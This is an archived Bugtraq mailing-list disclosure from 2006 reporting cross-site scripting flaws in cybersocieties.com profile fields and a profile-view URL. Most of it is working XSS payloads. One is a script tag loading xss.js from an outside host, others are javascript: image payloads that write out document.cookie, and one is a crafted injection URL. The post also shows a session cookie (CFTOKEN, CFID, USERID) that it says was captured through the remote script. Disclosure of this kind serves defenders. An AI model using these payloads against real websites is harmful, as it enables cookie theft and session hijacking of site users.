[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Cybersocieties.com - XSS & cookie disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Cybersocieties.com - XSS & cookie disclosure
From: luny@xxxxxxxxxxxxxxx
Date: 12 Jun 2006 22:30:39 -0000

Cybersocieties.com


Homepage:
http://www.cybersocieties.com

Effected files:

* Input boxes in profile:

- Full name box
- Occupation box
- MSN box
- Yahoo box
- AIM Box

* Viewing a profile

------------------------------------------------------

XSS vuln via input boxes in profile:

No filter evasion is needed. For PoC try putting the following codesin one of 
theboxes mentioned above:

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
or:

<IMG SRC=javascript:alert('XSS')>

or:

<IMG SRC="javascript:document.write(document.cookie)">

etc


Screenshots:
http://www.youfucktard.com/xsp/cyberso1.jpg
http://www.youfucktard.com/xsp/cyberso2.jpg
http://www.youfucktard.com/xsp/cyberso3.jpg

Our Cookie:

This is remote text via xss.js located at youfucktard.com 
CFTOKEN=544ABB96-138B-14A6-ADAD1496630F53D7; CFID=436305; USERID=28506

--------------------------------------------------------
Viewing a profile XSS vuln PoC:

http://www.cybersocieties.com/index.cfm?fractal=bsw.dsp.home.main&UserID=28506&tab=3";>">">">">'><SCRIPT></SCRIPT><BR><BR><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<""><"<'

Screenshot:
http://www.youfucktard.com/xsp/cyberso4.jpg

Prev by Date: Windowsitpro.com - XSS with cookie disclosure
Next by Date: Ratescene.co.uk - XSS with session disclosure
Previous by thread: Windowsitpro.com - XSS with cookie disclosure
Next by thread: Ratescene.co.uk - XSS with session disclosure
Index(es):
- Date
- Thread